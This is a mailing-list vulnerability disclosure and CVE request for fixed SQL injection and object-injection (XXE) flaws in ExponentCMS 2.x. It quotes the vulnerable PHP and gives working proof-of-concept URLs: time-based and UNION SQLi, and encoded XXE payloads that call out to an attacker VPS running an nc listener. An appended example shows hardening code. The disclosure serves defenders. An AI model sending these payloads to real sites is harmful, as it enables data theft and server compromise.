oss-sec mailing list archives
CVE request: ExponentCMS 2.x Object Injection and SQLi vulnerabilities
From: Carl Peng <felixk3y () gmail com>
Date: Fri, 30 Sep 2016 12:22:38 +0800
hello, I reported the following vulnerabilities to the ExponentCMS team some days ago, and they have now been fixed.

1) sqli-1

/framework/modules/ecommerce/controllers/cartController.php lines 61 - 66:

```php
$product_type = isset($this->params['product_type']) ? $this->params['product_type'] : 'product';
$product = new product();
//if we're trying to add a parent product ONLY, then we redirect to it's show view
$c = new stdClass();
if (isset($this->params['product_id']) && empty($this->params['children']))
    $c = $product->find('first', 'parent_id=' . $this->params['product_id']); //sqli
if (!empty($c->id)) {
    flash('message', gt("Please select a product and quantity from the options listed below to add to your cart."));
    redirect_to(array('controller'=> 'store', 'action'=> 'show', 'id'=> $this->params['product_id']));
}
```

The parameter "product_id" fails to be filtered; we can input "product_id=sqli" to execute SQL statements.

Proof of concept:

/index.php?controller=cart&action=addItem&product_id=-1/**/and/**/1=if(1,sleep(1),0)%23

2) sqli-2

/framework/modules/help/controllers/helpController.php lines 122 - 131:

```php
if (empty($this->params['version']) || $this->params['version'] == 'current') {
    $version_id = help_version::getCurrentHelpVersionId();
} else {
    $version_id = help_version::getHelpVersionId($this->params['version']); //sqli
    if (empty($version_id)) {
        $version_id = help_version::getCurrentHelpVersionId();
    }
}
$doc = $help->find('first', 'help_version_id='.$version_id.' AND sef_url="'.$this->params['title'].'"'); //sqli
$children = $help->find('count','parent='.$doc->id);
```

The parameters "version" and "title" fail to be filtered; we can input "version=sqli" or "title=sqli" to execute SQL statements.

Proof of concept:

/index.php?controller=help&action=show&version=1" union select 1%23&title=aaa" union select 1,user(),3,4,5,6,7,8,9,0,11,12,1,2,3,4,5,6,7,8,9,0,11,12%23

3) Object Injection -1

/framework/modules/core/controllers/expTagController.php#L228-L232

```php
foreach ($this->params['change_tag'] as $item) { // $item from user input
    $params['expTag'] = array();
    $classname = $this->params['mod'];
    $object = new $classname($item); // $classname also from user input
    expTag::deleteTag($this->params['mod'], $object->id);
    //...
}
```

Proof of concept (XXE):

[ We could use the php class "SimpleXMLElement" ( http://cn2.php.net/manual/en/simplexmlelement.construct.php ) to exploit it ]

step 1: VPS listening.. (nc -lvvp 8080)

step 2: /index.php?controller=expTag&action=change_tags&mod=SimpleXMLElement&change_tag[]=%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22http%3A%2F%2Fvps_ip%3A8080%2Fxxe_exists%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E

4) Object Injection -2

/framework/modules/core/controllers/expCatController.php#L175-L182

```php
if (!empty($this->params['change_cat'])) {
    foreach ($this->params['change_cat'] as $item) {
        $classname = $this->params['mod'];
        $object = new $classname($item);
        $params['expCat'][0] = $this->params['newcat'];
        $object->update($params);
    }
}
```

Proof of concept (XXE):

[ We could use the php class "SimpleXMLElement" ( http://cn2.php.net/manual/en/simplexmlelement.construct.php ) to exploit it ]

step 1: VPS listening.. (nc -lvvp 8080)

step 2: /index.php?controller=expCat&action=change_cats&mod=SimpleXMLElement&change_cat[]=%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22http%3A%2F%2Fyour_vps_ip%3A8080%2Fxxe_exists%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E

```
[root@cloud ~]# nc -lvvp 8080
Listening on any address 8080 (webcache)
Connection from 8.8.8.8:63017
GET /xxe_exists HTTP/1.0
Host: your_vps_ip:8080
```

And now, all vulnerabilities have been fixed.

https://github.com/exponentcms/exponent-cms/commit/99636b2118cd9af4eb9920f6b6c228bd824593d2
https://github.com/exponentcms/exponent-cms/commit/fdafb5ec97838e4edbd685f587f28d3174ebb3db

These issues were reported by Peng Hua of silence.com.cn Inc. and I would like to request CVEs for these issues (if not done so).

-------------------
http://www.silence.com.cn/
penghua () silence com cn
PKAV Team
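The two defects in the report share a root cause: request parameters reach `new $classname(...)` and a concatenated WHERE clause unchanged. Below is an added example (not ExponentCMS code and not the linked fixes) showing the checks a hardened controller would apply: an allowlist for the `mod` class name, integer validation for `product_id`, and a bound query for `title`. The helper names, the `ALLOWED_MODS` list, the `help` table name and the PDO connection are assumptions.

```php
<?php
// Added example, not ExponentCMS code: hardened handling of the two
// parameter patterns from the report. Helper names are hypothetical.
declare(strict_types=1);

// Classes a controller may instantiate from the user-supplied 'mod' parameter.
// Building a class name from input is what let SimpleXMLElement (and its XML
// parser) be reached in expTagController / expCatController.
const ALLOWED_MODS = ['expTag', 'expCat']; // hypothetical allowlist

function instantiate_allowed(string $classname, array $allowlist, mixed $item): object
{
    // strict in_array: exact, case-sensitive match, no type juggling
    if (!in_array($classname, $allowlist, true)) {
        throw new InvalidArgumentException("class '$classname' is not an allowed module");
    }
    return new $classname($item);
}

// Integer parameters such as product_id must never be concatenated into a
// WHERE clause as received. Validate as an int, return null for anything else.
function int_param(array $params, string $key): ?int
{
    if (!isset($params[$key])) {
        return null;
    }
    $v = filter_var($params[$key], FILTER_VALIDATE_INT);
    return $v === false ? null : $v;
}

// Free-text parameters such as 'title' are bound, not concatenated.
// Assumes a PDO handle and a 'help' table; Exponent's own DB layer is not shown.
function find_help_doc(PDO $db, int $versionId, string $title): ?array
{
    $stmt = $db->prepare(
        'SELECT * FROM help WHERE help_version_id = :vid AND sef_url = :title LIMIT 1'
    );
    $stmt->execute([':vid' => $versionId, ':title' => $title]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed inputs mirroring the report's proof-of-concept values.
assert(int_param(['product_id' => '-1/**/and/**/1=1'], 'product_id') === null);
assert(int_param(['product_id' => '42'], 'product_id') === 42);
try {
    instantiate_allowed('SimpleXMLElement', ALLOWED_MODS, '<root/>');
    assert(false, 'SimpleXMLElement must be rejected');
} catch (InvalidArgumentException $e) {
    // rejected before any constructor, and so any XML parsing, can run
}
```

Run with `php -d zend.assertions=1` so the assertions are evaluated; the rejected class name never reaches `new`, which is the property the allowlist is meant to guarantee.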